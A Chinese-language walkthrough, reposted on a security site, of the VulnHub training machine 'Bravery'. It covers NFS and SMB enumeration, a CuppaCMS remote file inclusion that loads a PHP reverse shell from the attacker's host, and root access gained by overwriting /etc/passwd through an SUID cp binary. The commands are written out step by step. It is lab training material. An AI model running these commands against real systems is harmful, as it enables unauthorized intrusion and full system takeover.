OSCP难度靶机之Bravery

admin 2022年9月26日09:01:47安全文章评论8 views1745字阅读5分49秒阅读模式

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/虚拟机简介:可能有不止一种方法来获得此计算机上的root特权目标:1个flag级别:初级

1、信息收集

1、通过netdiscover检测主机IP地址

netdiscover -r 192.168.207.0/24

OSCP难度靶机之Bravery

2、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.163

    通过扫描信息查看开放22、53、80、111、139、443、445、2049端口,并且检测到位WordPress4.8.3站点

OSCP难度靶机之Bravery

OSCP难度靶机之Bravery

2、WEB渗透测试

2.1 查看有nfs和smb服务,尝试nfs连接

showmount -e 192.168.207.163

OSCP难度靶机之Bravery

2.2 挂载文件系统

mkdir /tmp/nsf
mount -t nfs 192.168.207.163:/var/nfsshare /tmp/nsf

OSCP难度靶机之Bravery

2.3 查看目录中文件,类似密码

OSCP难度靶机之Bravery

2.4 使用enum4linux查看smb服务

enum4linux 192.168.207.163

    查看有anonymous和secured目录

OSCP难度靶机之Bravery

2.5 访问匿名文件夹

smbclient //192.168.207.163/anonymous
password: qwertyuioplkjhgfdsazxcvbnm

没有发现有用的信息

OSCP难度靶机之Bravery

2.6 尝试使用david用户访问secured文件夹

smbclient //192.168.207.163/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt

下载共享文件

OSCP难度靶机之Bravery

2.7 分别查看三个文件,得到网站访问目录

OSCP难度靶机之Bravery

OSCP难度靶机之Bravery

OSCP难度靶机之Bravery

2.8 登录WEB查看

http://192.168.207.163/developmentsecretpage

OSCP难度靶机之Bravery

http://192.168.207.163/genevieve/

OSCP难度靶机之Bravery

使用burp进行探测发现,有一个cuppaCMS

OSCP难度靶机之Bravery

OSCP难度靶机之Bravery

2.8 使用searchsploit进行查找,有一个文件包含

searchsploit cuppa

OSCP难度靶机之Bravery

2.9 查看POC

cat /usr/share/exploitdb/exploits/php/webapps/25971.txt

OSCP难度靶机之Bravery

2.10 使用POC反弹shell

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
vim shell.php

OSCP难度靶机之Bravery

2.11 开启http服务

python -m SimpleHTTPServer
nc -nlvp 4444
http://192.168.207.163/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.207.129:8000/shell.php?

OSCP难度靶机之Bravery

2.12 获取反弹shell

OSCP难度靶机之Bravery

2.13 使用python优化脚本

python -c 'import pty;pty.spawn("/bin/bash")'

OSCP难度靶机之Bravery

3、系统提权

3.1 查找有suid的二进制文件

find / -perm -u=s -type f 2>/dev/null

发现cp有suid的权限

OSCP难度靶机之Bravery

3.2 需要在kali机器上创建一个用户保存到/etc/passwd

密码为:hacker

perl -le 'print crypt("hacker","salt")'

使用perl生成加盐密码

OSCP难度靶机之Bravery

创建账号为hacker

cp /etc/passwd ./
echo 'hacker:sagIxVoGwjNkY:0:0::/root:/bin/bash' >> passwd

OSCP难度靶机之Bravery

3.3 在服务器上下载passwd文件

在kali上开启http服务

python -m SimpleHTTPServer

OSCP难度靶机之Bravery

在服务器上下载passwd文件

cd /tmp
wget http://192.168.207.129:8000/passwd
cp passwd /etc/passwd

OSCP难度靶机之Bravery

3.4 切换账号为hacker,查看flag

su - hacker
ls /root/

OSCP难度靶机之Bravery

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Bravery

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月26日09:01:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之Bravery http://cn-sec.com/archives/1315325.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: